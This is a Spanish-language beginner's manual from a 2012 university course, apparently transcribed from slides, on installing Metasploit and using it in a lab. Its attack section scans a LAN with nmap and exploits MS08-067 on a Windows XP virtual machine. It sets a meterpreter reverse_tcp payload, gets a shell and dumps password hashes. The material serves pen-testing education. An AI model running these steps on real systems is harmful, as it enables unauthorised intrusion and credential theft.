Guía básica metasploit

11
MANUAL BÁSICO DEL USO DE METASPLOIT FRAMEWORK EN UBUNTU 12.10 William Calderón y Javier Sáenz Universidad Nacional de Colombia 2012 CONTENIDO 1. DEFINICIONES 2. INSTALACIÓN 3. ACTUALIZACIÓN 3. INTERFACES 4. ATAQUE Y OPCIONES 5. CONCLUSIONES 1. DEFINICIONES METASPLOIT Es una herramienta de software abierto de seguridad informática para el desarrollo, pruebas, mejora y penetración a diversos sistemas operativos, Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una base de datos en la cual se encuentran toda la lista de exploits y vulnerabilidades, lo único que tenemos que indicarle a metasploit es que vulnerabilidad utilizaremos, que sistema atacaremos, que tipo de ataque utilizaremos y datos diversos que utilizará para atacar al host. Se llama Metasploit Framework por que es todo un entorno de pruebas para diversas plataformas, la cual trabaja con librerías, bases de datos, y diversos programas, shell codes, etc. Por tal deja de ser un simple software si no un framework. PEN-TESTING Un Penetration Testing o Test de Penetración, es un procedimiento metodológico y sistemático en el que se simula un ataque real a una red o sistema, con el fin de descubrir y reparar sus problemas de seguridad

description

MANUAL BÁSICO DEL USO DE METASPLOITFRAMEWORK EN UBUNTU 12.10

Transcript of Guía básica metasploit

  • MANUAL BSICO DEL USO DE METASPLOIT FRAMEWORK EN UBUNTU 12.10

    William Caldern y Javier SenzUniversidad Nacional de Colombia

    2012

    CONTENIDO

    1. DEFINICIONES2. INSTALACIN3. ACTUALIZACIN3. INTERFACES4. ATAQUE Y OPCIONES5. CONCLUSIONES

    1. DEFINICIONES

    METASPLOIT

    Es una herramienta de software abierto de seguridad informtica para el desarrollo, pruebas, mejora y penetracin a diversos sistemas operativos,

    Metasploit se ejecuta bajo una consola CYGWIN y trabaja con una base de datos en la cual se encuentran toda la lista de exploits y vulnerabilidades, lo nico que tenemos que indicarle a metasploit es que vulnerabilidad utilizaremos, que sistema atacaremos, que tipo de ataque utilizaremos y datos diversos que utilizar para atacar al host.

    Se llama Metasploit Framework por que es todo un entorno de pruebas para diversas plataformas, la cual trabaja con libreras, bases de datos, y diversos programas, shell codes, etc. Por tal deja de ser un simple software si no un framework.

    PEN-TESTING

    Un Penetration Testing o Test de Penetracin, es un procedimiento metodolgico y sistemtico en el que se simula un ataque real a una red o sistema, con el fin de descubrir y reparar sus problemas de seguridad

  • 2. INSTALACIN

    Descargamos directamente de la pgina oficial el instalador de Metasploit Framework dando click en el siguiente enlace http://www.metasploit.com/download/ y escogiendo la versin 32 bits o 64 bits segn sea el caso.

    Vamos a una Terminal y escribimos

    chmod +x metasploit-latest-linux-x64-installer.runsudo ./metasploit-latest-linux-x64-installer.run

    http://www.metasploit.com/download/

  • 3. ACTUALIZACIN

    Despus de terminar la instalacin (varios Siguientes y Finalizar) procedemos a actualizar el framework.

    De nuevo en la Terminal escribimos

    sudo msfupdate

    y esperamos a que finalice con

    Updated to revision XXXXX.

  • 4. INTERFACES

    4.1 MODO GUI

    Escribimos

    sudo msfgui

    4.2 MODO CONSOLA

    Escribimossudo msfconsole

  • 5. ATAQUE Y OPCIONES

    Trabajaremos nuestro metasploit por medio de la consola y directamente en un ataque a un Windows XP SP3 instalado como mquina virtual con el firewall desactivado.

    Inicialmente y antes de abrir nuestro metasploit debemos escanear nuestra red LAN.

    sudo nmap -O 192.168.0.1/24

    Tenemos como resultado

    Starting Nmap 6.00 ( http://nmap.org ) at 2012-11-29 01:27 COT Nmap scan report for 192.168.0.18 Host is up (0.00050s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 08:00:27:A2:3F:80 (Cadmus Computer Systems) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results: |_nbstat: NetBIOS name: USUARIO-7A1D458, NetBIOS user: , NetBIOS MAC: 08:00:27:a2:3f:80 (Cadmus Computer Systems) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-security-mode: | Account that was used for smb scripts: guest | User-level authentication | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Computer name: usuario-7a1d458 | NetBIOS computer name: USUARIO-7A1D458 | Workgroup: GRUPO_TRABAJO |_ System time: 2012-11-29 01:27:20 UTC-5

    TRACEROUTE HOP RTT ADDRESS 1 0.50 ms 192.168.0.18

    Como se puede ver, el puerto 445 se encuentra abierto, y existe un exploit que permite hacer uso de este puerto para controlar ese sistema remotamente.

  • Ahora, vamos al METASPLOIT en modo consola

    sudo msfconsole

    Podemos inicialmente ver la cantidad de exploits existentes en el framework con:

    show exploits

    Teniendo en cuenta la informacin obtenida con NMAP es bien sabido que el puerto 445 se puede atacar con el exploit ms08_067_netapi. Escribimos

    search exploit ms08_067_netapi

    Teniendo como resultado el lugar donde se guarda el exploit.

    Matching Modules ================

    Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

  • Escogemos el exploit

    use exploit/windows/smb/ms08_067_netapi

    Acto seguido debemos elegir el PAYLOAD (lo que queremos recibir despus de realizar el ataque). Podemos elegir bind shells o reverse shells. Existe tambin el payload llamado METERPRETER (definir).

    Para ver los payloads existentesshow payloads

    Digitamos el comando para elegir nuestro payload.

    set payload windows/meterpreter/reverse_tcp

  • Ahora que informacin especfica requiere el exploit y el payload?

    show options

    Hace falta RHOST (direccin IP de la vctima) y LHOST (direccin IP del atacante)

    Tenemos la IP de la vctima:

  • Definimos entonces

    set RHOST 192.168.0.18set LHOST 192.168.0.5

    Y ATACAMOS

    exploit

    Tenemos control de la mquina !!

  • Vemos las diversas opciones de METERPRETER.

    meterpreter> help

    Por lo que vemos existen muchas opciones, tales como SHELL (obtenemos un CMD de la mquina), HASHDUMP (obtenemos los hash de las claves de usuario del sistema), SCREENSHOT (tomamos un pantallazo de la mquina), entre muchos otros.

    SHELL

    HASHDUMP

  • IFCONFIG (verificamos que estamos dentro)

    5. CONCLUSIONES

    Metasploit es una herramienta muy til para realizar diferentes pruebas a un sistema y de esta manera identificar debilidades.

    Al ser una herramienta de software libre nos permite realizar modificaciones al cdigo fuente y mantener siempre actualizada la herramienta.

    Debido a que es una herramienta de libre acceso se presta para que usuarios malintencionados hagan mal uso de la misma.

    Para la realizacin de una auditoria de un sistema se debe realizar inicialmente un Information Gathering para despus saber que ataque realizar. Es necesario decirle a la Metasploit que tipo de ataque usar o de lo contrario no tendr efectividad.